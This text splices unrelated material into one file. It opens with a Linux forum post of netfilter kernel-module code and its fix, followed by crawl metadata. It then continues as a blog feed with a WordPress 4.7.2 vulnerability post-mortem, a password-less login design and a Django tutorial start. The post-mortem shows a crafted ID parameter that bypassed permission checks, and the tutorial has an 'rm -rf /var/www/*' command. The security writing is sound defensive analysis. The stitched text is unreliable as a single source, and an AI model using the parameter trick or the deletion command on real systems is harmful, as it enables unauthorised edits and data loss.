#include <linux/kernel.h>
#include <linux/module.h>
#include <usr/src/linux-headers-2.6.27-7-generic/include/linux/netfilter.h> //contains hook defs
#include </usr/src/linux-headers-2.6.27-7-generic/include/linux/netfilter_ipv4.h> //contains definitions of priorities
#include <linux/skbuff.h>
#include <linux/tcp.h>// contains definition of struct tcphdr
//declarations
static struct nf_hook_ops in_pre_routing;
static struct nf_hook_ops in_local_in;
unsigned int hook_func(unsigned int hooknum,
struct sk_buff **skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
if(!*skb)
{
// This place is reached in the code. I checked /var/log/messages
printk(KERN_INFO"\nPacket Dropped\n");
return NF_DROP;
}
else
return NF_ACCEPT;
// return(check_tcp_packet(*skb));
}
int init_module(void)
{
in_local_in.hook = hook_func; //user defined hook function
in_local_in.pf = PF_INET; //Protocol family
in_local_in.hooknum = NF_INET_LOCAL_IN; //
in_local_in.priority = NF_IP_PRI_FIRST;
nf_register_hook(&in_local_in);
return 0;
}
void cleanup_module(void)
{
// nf_unregister_hook(&in_pre_routing);
nf_unregister_hook(&in_local_in);
}
#endif
- Join Date
- Mar 2009
- 2
Found my mistake
I used the wrong method signature corresponding to my kernelheader files. the correct signature of the hook function should be
unsigned int hook_func(unsigned int hooknum,
struct sk_buff *skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
// func body of correct version
}
instead of
unsigned int hook_func(unsigned int hooknum,
struct sk_buff **skb,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff*))
{
//func body of old version
}
Silly me.
Thanks and apologies to all those who wasted time looking at this. | http://www.linuxforums.org/forum/kernel/142237-solved-empty-socket-buffer-while-using-netfilter.html | CC-MAIN-2018-13 | refinedweb | 475 | 50.63 |
Luke Plant's home page - Web development 4.7.2 post mortem2017-02-17T15:49:05+00:002017-02-17T15:49:05+00:00Luke Plant<p class="first last">Some lessons from the recent WordPress vulnerability</p> <p>A few weeks ago, <a class="reference external" href="">WordPress released version 4.7.2</a> to address several security vulnerabilities, including <a class="reference external" href="">one critical one</a>. This vulnerability allowed a remote, unauthorised attack to update web pages via the <span class="caps">REST</span> <span class="caps">API</span>. Since then, <a class="reference external" href="">hundreds of thousands of unpatched installations have been defaced</a>. In addition, in some cases this can lead to remote code execution, and <a class="reference external" href="">that has been seen in the wild</a>.</p> <p>The vulnerability was found by Sucuri, and <a class="reference external" href="">they have detailed the issue on their blog</a>.</p> <p>I haven’t found much by way of deeper analysis, and so this post is my take on some of the deeper coding/development process issues behind such a serious security problem. It is meant to be constructive — that is, what positive lessons can be learned for avoiding this kind of thing in our own projects.</p> <p>(Upfront note about my biases: I’m not a fan of <span class="caps">PHP</span>, though I used to be a long time ago, or WordPress, especially when it comes to security; after <span class="caps">PHP</span> I’ve worked mainly with Python, and I’m a (rather inactive) Django core developer; I’ve used various other languages, and I’m drawn to languages like Haskell and similar.)</p> <div class="section" id="summary-of-coding-error"> <h2>Summary of coding error</h2> <p>The primary error was a piece of code that failed to check a returned value to see if it was an error value. In particular, the code looked like the following (removing irrelevant details, as I will for all the samples in this post):</p> <div class="highlight"><pre class="code php literal-block"><span></span><span class="x">public function update_item_permissions_check( $request ) {</span> <span class="x"> $post = get_post( request['id'] );</span> <span class="x"> if ($post && ! $this->check_update_permissions( $post ) {</span> <span class="x"> return new WP_Error(...);</span> <span class="x"> }</span> <span class="x"> # Various other conditions checked</span> <span class="x"> return true;</span> <span class="x">}</span> </pre></div> <p>In this case, <tt class="docutils literal">get_post</tt> could return an error value, but this was never checked for, so the permissions check ends up returning <tt class="docutils literal">true</tt>. Therefore, the permissions check was inadequate, allowing the privilege escalation — i.e. an unauthorised user could change any post by forcing the error condition in <tt class="docutils literal">get_post</tt>, which turns out to be easy to do.</p> <p>There are various other bits of code that have issues, particularly failure to properly validate the incoming post <span class="caps">ID</span>, and code which did it different ways. If any one of them been done differently, the vulnerability might have been avoided. You can look at Securi’s posts above to see the full details, and I’ll discuss more below.</p> </div> <div class="section" id="causes-of-the-vulnerability"> <h2>Causes of the vulnerability</h2> <p>Now I’ll come to a list of issues that I think were, or might have been, behind this vulnerability.</p> <p>I’m aware that some of these may annoy you if your framework/language of choice is implicated as inferior — but if you react by dismissing that point, and saying it was all the <strong>others</strong> that are to blame, you’ve missed the whole point of doing a post mortem on someone else’s misfortune.</p> <ol class="arabic"> <li><p class="first">Dynamic typing/null values.</p> <p>The <tt class="docutils literal">get_post</tt> method was able to return a null value, instead of an object, without forcing that value to be checked. This is a flaw in all dynamically typed languages, and many statically typed ones. In statically typed languages that do not allow null values (e.g. Haskell, Rust in normal code), you’d be forced to choose an explicit error handling mechanism that would be much less prone to this kind of issue.</p> <p>There are multiple other ways that these kinds of statically typed languages would have prevented an invalid string from being passed through multiple levels of code — the design of such languages generally forces you to sanitise earlier, eliminating the confusion that caused this bug.</p> </li> <li><p class="first"><span class="caps">PHP</span> flaw — very poor error handling mechanisms.</p> <p>Builtin <span class="caps">PHP</span> functions, and therefore any <span class="caps">PHP</span> project, has a whole range of error handling mechanisms — errors, warnings, returning error values, and exceptions. At every point, calling code needs to know which system will be used to handle errors. The calling code in <tt class="docutils literal">update_item_permissions_check</tt> above would have been fine if <tt class="docutils literal">get_post</tt> had thrown an exception for an invalid post, but it didn’t. To review the code, you need to know the implementation and conventions of the code that is being called, which is seriously impeded by having multiple options.</p> </li> <li><p class="first">Poor choice of error handling.</p> <p>While <span class="caps">PHP</span> has flawed error handling (as above), it is still possible to do your best. Since <span class="caps">PHP</span> has no method to ensure that calling code checks for returned errors, using returned error values (whether null values, like <tt class="docutils literal">null</tt>, <tt class="docutils literal">false</tt> etc., or custom error objects) is one of the worst kinds of error handling mechanisms in <span class="caps">PHP</span>, and WordPress made the mistake of using it.</p> <p>In fact, doing it correctly in WordPress is harder, in that they use not only builtin false-y values to indicate errors, but they also have a custom error class <tt class="docutils literal">WP_Error</tt>, which is not false-y (and probably can’t be false-y due to <span class="caps">PHP</span> limitations), so that properly checking for a null/error condition is either very verbose, or requires you to remember which convention is used. (e.g. <tt class="docutils literal">get_post</tt> returns <tt class="docutils literal">null</tt> for error conditions, but <tt class="docutils literal"><span class="pre">WP_REST_Posts_Controller::get_post</span></tt> returns <tt class="docutils literal">WP_Error</tt>).</p> <p>This contrasts with languages like Go, for example. Go returns a tuple for every method that can fail, and it you don’t check/use the error value from the calling code, compilation fails, so it is much, much harder to get this wrong. Plus, the language design means that basically all Go code will work the same, so you know what correct looks like.</p> <p>It also contrasts with conventions in Python and frameworks like <a class="reference external" href="">Django</a>, which will typically raise exceptions in situations like this <tt class="docutils literal"><span class="pre">Post.objects.get(id='invalidid')</span></tt> will raise <tt class="docutils literal">Post.DoesNotExist</tt>, rather than return <tt class="docutils literal">None</tt> etc.</p> </li> <li><p class="first">Very poor framework design decision — merging of parameters from <span class="caps">URL</span> path component and query string parameters.</p> <p>The WordPress code for the <span class="caps">REST</span> <span class="caps">API</span> has some routing methodology that allows parameters to be defined in the paths of URLs e.g.:</p> <pre class="literal-block"> "/(?P<id>[\d+]+)" </pre> <p>This regex matches part of the path component in a <span class="caps">URL</span>, and the name <tt class="docutils literal">id</tt> is used as a key in a dictionary of parameters passed to the handling function. (This is pretty much exactly like Django <span class="caps">URL</span> routing). These matched parameters are available in the request object passed to the functions above.</p> <p>However, that object also includes <span class="caps">GET</span> (and perhaps <span class="caps">POST</span>) parameters, and as it happens, when you do the simple dictionary access on that object, you get a merged version in which <span class="caps">GET</span> takes priority over the <span class="caps">URL</span> path components. This means that it is possible to pass an <tt class="docutils literal">id</tt> value that doesn’t match the regex:</p> <pre class="literal-block"> /123/?id=123somethingelse </pre> <p>…and it is <tt class="docutils literal">123somethingelse</tt>, not <tt class="docutils literal">123</tt> that will be returned by <tt class="docutils literal"><span class="pre">request['id']</span></tt> shown in the pseudo-code above. While there are more specific methods available for getting <span class="caps">URL</span> path or query string parameters, the dictionary/array access shown is the most convenient (and therefore most encouraged) way to get data out of it.</p> <p>This feature seems to be inspired by <span class="caps">PHP</span>’s <tt class="docutils literal">$_REQUEST</tt>, but is worse, because <tt class="docutils literal">$_REQUEST</tt> is no more convenient than <tt class="docutils literal">$_POST</tt> or <tt class="docutils literal">$_GET</tt>, and in fact requires more characters to type. Here, however, not only is the merged dictionary more convenient to access than the un-merged ones, it also includes <span class="caps">URL</span> path components to confuse things even more.</p> <p>This meant that the checking of the format of the <span class="caps">ID</span> parameter that appeared to take place in the routing code (via a regex that limited to numeric IDs) was ineffective.</p> <p>Lesson: Merging data from multiple distinct sources into a single bag with the same namespace is very often a bad idea. In particular, if the different sources are not subject to the same validation rules, or correct usage might rely on users knowing which source has precedence, you are asking for trouble.</p> <p>Historic Django note: long ago before 1.0 Django had a very similar feature — dictionary access on the request object did a merge of <tt class="docutils literal">request.<span class="caps">GET</span></tt> and <tt class="docutils literal">request.<span class="caps">POST</span></tt> parameters. It was realised this was a bad idea, and for the 1.0 release this was replaced with a more explicit and discouraged <tt class="docutils literal">request.<span class="caps">REQUEST</span></tt> object. This too was eventually <a class="reference external" href="">deprecated in 1.7</a> and later removed. I heard <a class="reference external" href="">some protests</a> about this, but I’m glad it’s gone — it is too much of a liability to justify its very occasional usefulness.</p> <p>(Update — just hours after writing this post, while reviewing deprecation warnings for a Django 1.8 project I maintain, a usage of <tt class="docutils literal">request.<span class="caps">REQUEST</span></tt> was flagged and — surprise, surprise — it haboured a security vulnerability).</p> </li> <li><p class="first">Multiple calls to retrieve the same thing from the database.</p> <p>You might think that since <tt class="docutils literal">get_post</tt> returns a null object (of some kind), then there won’t be a post object to update, and therefore no vulnerability. However, it turns out that <tt class="docutils literal">get_post</tt> is called in multiple places within the handler — once to check permissions, and again to actually do the update, something like this:</p> <pre class="literal-block"> public function update_item( $request ) { $id = (int)request['id']; $post = get_post( $id ); # Some checks and processing...then: wp_update_post( $post, $some_other_data ); } </pre> <p>When this code is run, the permission checks should have already been run (in a separate code path). This is a performance bug in itself — it is doing multiple <span class="caps">DB</span> queries (assuming no caching) to get the same thing.</p> <p>There is a bigger problem, which is that it is possible for the different callees to call <tt class="docutils literal">get_post</tt> with different data, and as it turns out they do. The difference allowed the attack to proceed — the code checking for permission to edit the object did not find an object to edit, but the code doing the editing did. This is a flawed permission checking <span class="caps">API</span>.</p> <p>Lesson: if your permission checking code is separate from the main path that retrieves the data, it might be doing something critically different.</p> <p>Lesson: if you are loading the same data from the database multiple times, this is a code smell that you’ve got duplication that might be harbouring mistakes.</p> </li> <li><p class="first">Multiple attempts at sanitising.</p> <p>Sanitising is good, but it should be done in the right place. In <tt class="docutils literal">update_item</tt> above, when it called <tt class="docutils literal">get_post</tt> it made a half-hearted attempt to sanitise the post <span class="caps">ID</span> value it passed in, by converting to an integer. This made it different from the other call to <tt class="docutils literal">get_post</tt>, with the result described above — this code was able to retrieve a post object to update, while the permissions checking code was not.</p> <p>The problem is that just sanitising what you pass to a call doesn’t sanitise where you got it from, or sanitise other people’s usage of it which might have happened earlier. Sanitising is in the wrong place if it does not make it harder for any other code to get the unsanitised data.</p> <p>Lesson: If you’re sanitising data all over the place, it’s a sign you don’t actually know how to clean input data up, and you could in fact be making things worse.</p> </li> <li><p class="first"><span class="caps">PHP</span> weak typing flaw — ‘casting’ (as it is called in <span class="caps">PHP</span>) doesn’t raise errors for invalid values, and in fact sometimes just ignores bad data.</p> <p>Namely, in <span class="caps">PHP</span>:</p> <pre class="literal-block"> (int)"123abc" === 123 </pre> <p>However:</p> <pre class="literal-block"> is_numeric("123abc") === false </pre> <p>So, in <tt class="docutils literal">update_item</tt> above, ‘casting’ to an int just ignores the data that couldn’t be converted. If <span class="caps">PHP</span> had done something more strict (e.g. raise an error, or even return null), this vulnerability would not have happened. In fact, if these two methods had simply agreed with each other, the vulnerability would not have happened either. The difference between them meant that one bit of code thought “There isn’t a valid <span class="caps">ID</span> that I could even use to do a <span class="caps">DB</span> lookup”, and another was able to find a post just fine, by ignoring the data that didn’t look like a number.</p> </li> <li><p class="first">A permissions framework that defaults to “allow”.</p> <p>The permission method responsible for the failure basically works like this:</p> <pre class="literal-block"> if error_condition_1: return Error(...) if missing_permission_1: return Error(...) if missing_permission_2: return Error(...) return True </pre> <p>It’s basically impossible to look at the code and guess whether they missed anything (in this case, checking for an error code in one of the called functions was missing). A lot of permission checking code looks like this, or has the same “default to allow” construction. For example, in Django code, views are all public by default, and you have to remember to add a decorator to limit access.</p> <p>Many database applications also work the same way — often any code in the application can access and update any record of any table, and you have to specifically remember every single limitation you want to apply if you don’t want the “allow all” behaviour. Fixing this can be hard, requiring big changes in architecture.</p> <p>One way to do it is to have allowed functionality encapsulated into some kind of code object, that is only returned when correct credentials are passed. Or, permissions check methods should return some credential object that must then be passed to every model layer function that wants to take some action.</p> <p>At the very least, rather than the <span class="caps">REST</span> interface and the normal admin interface doing the same checks, the model layer should do this. This results in less code surface area to attack.</p> </li> <li><p class="first">A “don’t let it crash” mentality.</p> <p>The design of <span class="caps">PHP</span> has this mentality — most builtin functionality will just try to continue and return <strong>something</strong> rather raise an error that might terminate execution of the program. This is due to its history as a template language. Unfortunately, while this might sometimes be a reasonable design choice for templating (though that is highly debatable), it is always a terrible choice for a general purpose language. It is better to crash than to do the wrong thing.</p> <p>The same mentality can be seen in some of the code involved in this vulnerability.</p> <p>For example, <tt class="docutils literal">update_item</tt> has:</p> <pre class="literal-block"> public function update_item( $request ) { $id = (int) $request['id']; $post = get_post( $id ); </pre> <p>Converting to integer presumably is designed to makes sure that <tt class="docutils literal">get_post</tt> doesn’t crash — we will at least be passing it something of the right form. It is a misguided and misimplemented form of defensive programming. If it had been omitted, the vulnerability would have been avoided.</p> <p>In <tt class="docutils literal">update_item_permissions_check</tt>, we have this code:</p> <pre class="literal-block"> public function update_item_permissions_check( $request ) { $post = get_post( $request['id'] ); if ( $post && ! $this->check_update_permission( $post ) ) { ... </pre> <p>The code checks that <tt class="docutils literal">$post</tt> is not <tt class="docutils literal">null</tt> or false-y before attempting to call a method on it. This is again defensive programming, and seems reasonable, but in fact is only designed to make sure the code the doesn’t crash <em>here</em> — “I must remember not to call a function that might crash with <tt class="docutils literal">null</tt> parameters”. However, the big problem is that the code doesn’t actually deal with the possibility that <tt class="docutils literal">$post == null</tt>. If instead the code had avoided the <tt class="docutils literal">null</tt> check, then for the exploit scenario <tt class="docutils literal">check_update_permission</tt> would simply have caused a crash — which would have been harmless (you just get a 500 error, which is an error for that user, but doesn’t affect anyone else).</p> <p>In fact the 4.7.2 code still has the same structure, but now looks like this:</p> <pre class="literal-block"> $post = $this->get_post( $request['id'] ); if ( is_wp_error( $post ) ) { return $post; } if ( $post && ! $this->check_update_permission( $post ) ) { ... </pre> <p>The last line here makes no sense now — unlike the global function <tt class="docutils literal">get_post</tt>, <tt class="docutils literal"><span class="pre">$this->get_post</span></tt> never returns a false-y value, it returns either a <tt class="docutils literal">WP_Post</tt> or a <tt class="docutils literal">WP_Error</tt>. The rest of the codebase is littered with this kind of thing, and in many cases it is the right thing (at least locally). This pattern can easily become a habit, and so it becomes hard to spot that here it is a vulnerability (4.7.1 code), or makes no sense (4.7.2).</p> <p>Lesson: the aim should be that your program does the <strong>right</strong> thing, and if it can’t do that, it should do <strong>nothing</strong>. The worst thing you can do is have a philosophy of “whatever happens, the program should not crash in the line of code I’m currently writing”.</p> </li> <li><p class="first">Code-base compatibility constraints.</p> <p>Looking through the code, it becomes clear that there are multiple different ways to do everything.</p> <p>The <span class="caps">REST</span> <span class="caps">API</span> uses code that is Ruby-on-Rails-ish — controller classes with request objects being passed in to methods. This feels modern-ish (despite various design flaws I’ve mentioned and being very verbose) — anyone using a recent web framework would understand roughly how it works. Most of the rest of the code base uses the classic “Spaghetti <span class="caps">PHP</span> files” anti-pattern — a chain of includes that you have to follow to work out where things are actually done, request handling code executing at the top level rather than just function and class definitions.</p> <p>As noted above, some functions use false-y values to indicate errors, others use <tt class="docutils literal">WP_Error</tt> (e.g. <tt class="docutils literal"><span class="pre">WP_REST_Posts_Controller::get_post</span></tt>). You’ve just got to remember which is which to get it right. In fact, of the first variety, some code uses <tt class="docutils literal">false</tt> (e.g. <tt class="docutils literal"><span class="pre">WP_Post::get_instance</span></tt>), while some use <tt class="docutils literal">null</tt> (e.g. global <tt class="docutils literal">get_post</tt>), which is the kind of inconsistency that is asking for trouble.</p> <p>Why hasn’t any of this been cleaned up? My guess is backwards-compatibility. WordPress’s crown jewel is its installation base, which is huge. Fixing their code to be more consistent and secure would involve breaking tons of plugins, so they are not going to do that. Their only option is to try to write new code using better patterns, but this is itself a problem — the classic <a class="reference external" href="">Lava flow anti-pattern</a>.</p> <p>Sometimes people complain about the rate at which Django <a class="reference external" href="">deprecates</a> things, but I’ve already given one example above of why it is very important that we do so. Django has a pretty good track record on security only because we are willing to sometimes break things at the <strong><span class="caps">API</span></strong> level, rather than just leave sharp edges everywhere and tell people not to cut themselves.</p> </li> <li><p class="first">Volume of code. The more verbose your code, the easier it will be for code reviews to miss things like this — both specific errors, and poor internal <span class="caps">API</span> design.</p> <p>Look at the WordPress code, and you will find there is <strong>tons</strong> of it. It is extremely verbose — it’s like you are reading code designed to mimic the bad points of Java with none of its good points. Every class is so big it needs its own file, despite having extremely little meat in it.</p> <p>WordPress is currently about 500,000 <span class="caps">LOC</span> (<span class="caps">PHP</span>+<span class="caps">JS</span>+<span class="caps">CSS</span>, including comments, not including docs, tests and bundled themes, and not including other text that does not need to be maintained — I tried to come up with some criteria that would be roughly fair to several projects, knowing that they are different in nature).</p> <p>Compare this (with the caveats already mentioned, and using similar criteria for counting) to:</p> <ul class="simple"> <li>the web framework framework Django — about 135,000</li> <li>the Django based <span class="caps">CMS</span> Mezzanine — 43,000</li> <li>the Django based <span class="caps">CMS</span> WagTail — 57,000</li> <li>the Django based <span class="caps">CMS</span> django-fiber — 18,000</li> </ul> <p>Or, within a <span class="caps">CMS</span>, compare the <a class="reference external" href=""><span class="caps">REST</span> backend in WordPress</a> which is about 9,000 <span class="caps">LOC</span> (not including an additional 3,000 in the base classes and other supporting code), with the <a class="reference external" href=""><span class="caps">REST</span> backend in django-fiber</a> — about 300 <span class="caps">LOC</span> (it uses <a class="reference external" href="">django-rest-framework</a> to do the heavy lifting).</p> <p>If we decide that’s not fair, we could also compare to <a class="reference external" href="">WagTail’s <span class="caps">REST</span> <span class="caps">API</span></a> which doesn’t use a framework (other than Django), and therefore includes its own router and serialization classes, and still only weighs in at 1,400 <span class="caps">LOC</span> — about one tenth the size of the equivalent code in WordPress.</p> <p>Yes, django-fiber uses django-rest-framework, and all the above use Django and other projects, but those other projects provide re-usable code, code that has many features unused by the above <span class="caps">CMS</span>’s, and code that is therefore very generic. WordPress code on the other hand, despite its ‘framework’ code being written for internal use, and not really being usable outside WordPress, manages to be many times more verbose. You could put Django, django-rest-framework (15k), Mezzanine, Wagtail, django-fiber, Pillow (image library used by many Python CMSs, 22k), django-mptt and django-treebeard (Django database tree libraries used by these CMSes, 4k and 6k), django-compressor (build tool used by several, 5k) all together and still be nowhere near matching WordPress for <span class="caps">LOC</span>.</p> <p>How does WordPress manage to be so big? Yes, WordPress code contains more comments, but that’s still code you have to scroll past, or read to understand. Whatever the reason, one of the consequences is that when reviewing code, you are just going to fall asleep that much sooner. I couldn’t find much by way of detailed review for the <a class="reference external" href="">ticket that introduced the WordPress <span class="caps">REST</span> infrastructure</a> given it is such a big patch (but I might be looking in the wrong places).</p> <p>I suspect that the verbosity of WordPress is likely triggered by the poor quality of language features and/or poor internal design.</p> <p>The linked Python code is generally much more compact, and this is probably mainly due to the design of Python, especially things like first-class classes and decorators. In some cases, there are definitions of <span class="caps">REST</span> <span class="caps">API</span> endpoints that have no methods defined in them at all. Declarative code was sufficient in many cases, and the code is easy to read and very free of noise.</p> </li> <li><p class="first">Not learning from other systems and frameworks.</p> <p>I’ve highlighted a few places in the design of WordPress’s <span class="caps">REST</span> infrastructure that look like very poor design decisions (e.g. merging of parameters from different sources). These things are are known to be poor design decisions in other parts of the web development world (e.g. Django removed or discouraged them years ago), yet experienced <span class="caps">PHP</span> developers didn’t see them when it came to code review time. This could have been because they fell asleep due to the volume, but I’d tentatively suggest that another factor might have been a narrow experience of the world, and one particularly dominated by the norms of the <span class="caps">PHP</span> world, where the whole language and framework design normalises poor design decisions.</p> <p>This may be unfair — a lot of the new code for the <span class="caps">REST</span> <span class="caps">API</span> looks like it is inspired by other frameworks, which presumably means the developers have had some exposure to other systems.</p> <p>But either way — the lesson is that a failure to learn from other programming sub-cultures and other languages means we might be walking into traps that we could easily avoid. For myself, I think that in the Python community there can be a snobbishness about other languages (e.g. the way I look down on <span class="caps">PHP</span>) that can lead to a complacent lack of knowledge of other languages and systems that are way ahead in some areas.</p> </li> </ol> <p>Well, that’s all. Hopefully there is something we can learn from this nasty vulnerability!</p> </div> A simple password-less, email-only login system2016-07-17T16:52:10+00:002016-07-17T16:52:10+00:00Luke Plant<p class="first last">A simple password-less login system to consider for some use cases, with Django code.</p> <p.</p> <div class="section" id="outline"> <h2>Outline</h2> <p>The authentication system is simply this:</p> .</p> <p>This is <a class="reference external" href="">not a new idea</a>, although I don’t think I was conscious of other implementations when I created mine. In this post I’m presenting my rationale for it, listing some advantages that I haven’t seen elsewhere, and other implementation pointers.</p> </div> <div class="section" id="rationale"> <h2>Rationale</h2> <ol class="arabic"> <li><p class="first".</p> <p>With this system, email verification and login are combined.</p> </li> <li><p class="first".</p> </li> <li><p class="first">For the site implementation, not having a password to store is even better — there is no way you can mess up password hashing and storage, no possibility of a password database being stolen, because you simply do not have passwords.</p> </li> <li><p class="first">Not having a password to enter the first time reduces friction for most users.</p> </li> <li><p class="first":</p> <ol class="arabic simple"> <li>choose weak passwords that they can remember easily, which is bad for security,</li> <li>re-use a password so they can remember it easily, again bad for security, or,</li> <li>forget their password.</li> </ol> <p>However, with a password reset, the process is much, much worse:</p> <ol class="arabic simple"> <li>First they have to remember if they signed up for the site in the past, to work out if they should “log in” or “create account”.</li> <li>Then they have to make several attempts at remembering their password.</li> <li>Then they’ve got to use the password reset feature (hopefully it isn’t hidden, but I’ve seen users struggle with this when literally the only things on the page were the login form and a “Forgotten your password?” link).</li> <li>They then have to check their email and click the link.</li> <li>Now they have to negotiate a new password form, possibly including a strength monitor that won’t allow them to choose a weak password.</li> <li).</li> </ol> <p>By removing the password entirely, most of these steps are eliminated. Steps 1, 2 and 3 are replaced by a single method for logging in — “Enter your email address”. Step 4 is the same, steps 5 and 6 are eliminated.</p> </li> </ol> <p>There are some additional advantages:</p> <ul> <li><p class="first">By doing email verification every time, we ensure that we still have a working email address. If we use some email/username + password combination for login, we have to add some kind of regular “Is this still your email address?” feature, or find ourselves unable to contact our users.</p> </li> <li><p class="first".</p> <p>So, for example, if we send an email asking for payment, the link can take them straight to the payment page, already logged in. This is the ideal situation, and we can do it with the tiniest amount of work (adding a query parameter to a <span class="caps">URL</span> in an email), because we can just re-use the existing login mechanism.</p> </li> <li><p class="first">There are significant improvements for privacy concerns.</p> <p>A typical email + password login system has some problems when it comes to privacy, because it is often possible for an attacker to determine that a certain person has an account with a web site. This can be often be done from several pages on the site:</p> <ol class="arabic simple"> <li>The account creation form</li> <li>The log in form</li> <li>The password reset form</li> </ol> <p>And it can be done in a number of ways:</p> <ol class="arabic simple"> <li>By looking at the different error/validation messages that are returned by these pages, for the cases of existing or non-existing accounts.</li> <li>Even if the messages returned are identical, by doing <a class="reference external" href="">timing attacks</a> on the pages.</li> </ol> <p>Fixing method 1 often results in <span class="caps">UX</span>:</p> <img alt="Man getting very mad with computer." class="align-center" src="/blogmedia/computer_rage.gif" /> <p>Fixing method 2 can be very hard. The use of strong password hashing makes a timing attack on the login page trivial if no precautions are taken. <a class="reference external" href="">Django</a>, for instance, was vulnerable to this for a long while. It now has <a class="reference external" href="">rudimentary mitigation</a>,.</p> <p>However, with the system described in this post, these attacks, and the <span class="caps">UX</span>.</p> </li> <li><p class="first">On a code level, the amount of code required for this is very small. Compared to the typical alternative (email/username+password, all the forms to manage passwords, password reset etc.), it is tiny. That alone gives big maintenance and security advantages.</p> </li> </ul> </div> <div class="section" id="disadvantages"> <h2>Disadvantages</h2> <p>There are of course some disadvantages:</p> <ul> <li><p class="first">Not all users have secure email systems, and emails could be intercepted, allowing an attacker to use someone else’s account. As noted already, you are already living with the same issue if you have a password-reset-via-email-link feature.</p> </li> <li><p class="first".</p> </li> <li><p class="first".</p> <p.</p> </li> </ul> </div> <div class="section" id="implementation-issues"> <h2>Implementation issues</h2> <p>There are some implementation issues to be aware of, especially security related:</p> <ol class="arabic"> <li><p class="first">You need a correct and secure way of creating the unique login links. They need to contain some kind of token that verifies an email address, a token which cannot be guessed by an attacker.</p> </li> <li><p class="first">The login links should expire — so that a temporary breach of someone’s email account, or accidentally sharing the link, doesn’t given an attacker login access forever.</p> </li> <li><p class="first">When comparing the token, you need to be aware of timing attacks.</p> </li> <li><p class="first">Security tokens in URLs are a dangerous thing, as they can easily be pinched. It can happen when a user copy-pastes or shares a <span class="caps">URL</span>, and it can happen if a page links to has any 3rd resources, which will then be able to see the <span class="caps">URL</span> (and the token) via the Referer header.</p> <p>Because of this, the token should be checked before any page is rendered, and you should redirect immediately, either to a failure page if it doesn’t match, or to a <span class="caps">URL</span> without the token. If you use a query string parameter for the token, this is easy — for the success case you just return <span class="caps">HTTP</span> redirect response to the same <span class="caps">URL</span> but without the token query parameter (and with a login cookie attached to the response).</p> </li> <li><p class="first">You should do case insensitive comparison on email address when looking for an existing account — people don’t always type their email addresses with the same case.</p> </li> <li><p class="first".</p> </li> </ol> <p>In my implementation, I use Django’s <a class="reference external" href="">TimestampSigner</a> to sign the email address. This takes care of <strong>1</strong> (Django uses a <span class="caps">HMAC</span> on the string), <strong>2</strong> (you just pass the <tt class="docutils literal">max_age</tt> parameter to <tt class="docutils literal">unsign</tt>) and <strong>3</strong> (Django’s <tt class="docutils literal">Signer</tt> uses a <tt class="docutils literal">constant_time_compare</tt> function <a class="reference external" href="">internally</a>).</p> <p>I then base64 encode the result to produce a tidy <span class="caps">URL</span>. This results in a longish <span class="caps">URL</span>, but not too long to be impractical. I created a <a class="reference external" href="">small class</a> to wrap up the encoding and decoding.</p> <p>(An alternative would be to create a nonce and store it in a database on the server, associated with the email address. The implementation above has the advantage that it doesn’t require server side resources, but the disadvantage of requiring a longer <span class="caps">URL</span>).</p> <p>I do the checking in a <a class="reference external" href="">middleware</a>, including the redirect to handle item <strong>4</strong> above. I currently use Django’s signed cookies for implementing login. If a server side session was used, then it would be easier to implement “log out from all devices”.</p> <p>I’m using a custom model for this account, which does not have a password field, and I’m also using a normal <tt class="docutils literal">User</tt> model for other purposes, so it doesn’t make sense for me to release this as a standalone Django authentication library. But feel free to take the code and do so, or borrow in any other way.</p> <p>There are other variations on this that could be used, but I think the basic pattern is very useful for some use cases, eliminating a lot of the user hassles and programmer headaches often found with passwords.</p> <p>This is also not meant to be an alternative to things like OAuth. It is meant to be an alternative to email+password logins. If OAuth is used as well (should you venture down that <a class="reference external" href="">somewhat</a> <a class="reference external" href="">dubious</a> <a class="reference external" href="">path</a>, ), then enhancements are possible — for instance, for people who create accounts via OAuth, there could the option to disable login by email link. This would mitigate the risk of account takeover due to people with insecure email providers.</p> <hr class="docutils" /> <p>Updates:</p> <ul class="simple"> <li>2016-07-18: Note about alternatives like OAuth2</li> <li>2016-07-18: Note about implementing “log out from all devices”</li> <li>2016-07-19: Note about security of email services.</li> <li>2016-07-19: Paragraph about prior art</li> </ul> <p>(Thanks to reddit comments for the prompts that pointed some of these issues out).</p> </div> How to learn Django without installing anything2014-06-03T14:40:24+00:002014-06-03T14:40:24+00:00Luke Plant<p class="first last">Pretty much what it says in the title…</p> <p>Here is way of learning to create a website using the <a class="reference external" href="">Django</a> web framework without having to install anything on your local computer.</p> <p>This might be useful if:</p> <ul class="simple"> <li>you are intimidated by all the hurdles you need just to get to the beginning of the tutorial.</li> <li>you can’t install things on your own computer.</li> <li>or you want to be able to carry on with the learning from a different computer, without copying your progress or installing things on the other computer.</li> </ul> <div class="section" id="prerequisites"> <h2>Prerequisites</h2> <ul> <li><p class="first">I’m assuming you already know how to program in Python, or are sufficiently experienced with programming that you don’t mind learning Python while learning Django at the same time. If not, have a look at these starting points:</p> <p>If you don’t know much about programming, try <a class="reference external" href="">Learn Python The Hard Way</a>.</p> <p>If you are experienced with other programming languages, but not Python, try, <a class="reference external" href="">Dive Into Python</a>.</p> </li> <li><p class="first">I’m assuming you are reasonably comfortable with typing things into a command prompt or terminal. Thankfully, even if you are not, you’ll be doing everything in a virtual machine somewhere on the internet, so you can’t break anything!</p> </li> </ul> </div> <div class="section" id="steps"> <h2>Steps</h2> <ul> <li><p class="first">Go to <a class="reference external" href=""></a> and sign up for an account.</p> </li> <li><p class="first">Create a new project, choosing ‘Django’.</p> </li> <li><p class="first">You’ll be presented with an almost empty Django project, complete with a terminal. You can browse and edit files, and types commands at the terminal, and press the big green ‘Run’ button to run your site and view pages in another tab.</p> <p>However, we first want to remove some things so that we can follow the Django tutorial exactly.</p> <p>In the terminal, type the following commands and hit enter. First, delete all the files created in <tt class="docutils literal">/var/www</tt>:</p> <div class="highlight"><pre class="code bash literal-block"><span></span>rm -rf /var/www/* </pre></div> <p>Next, we need to upgrade Django, because runnable.com installed an old version:</p> <div class="highlight"><pre class="code bash literal-block"><span></span>pip install --upgrade Django </pre></div> </li> <li><p class="first">Now, open up the Django docs and start the tutorial, from part 1:</p> <p><a class="reference external" href=""></a></p> </li> </ul> </div> <div class="section" id="adjustments"> <h2>Adjustments</h2> <p>Because you are running on runnable.com, rather than your own computer, you’ll need to make some very slight adjustments to the instructions at certain places:</p> <ul> 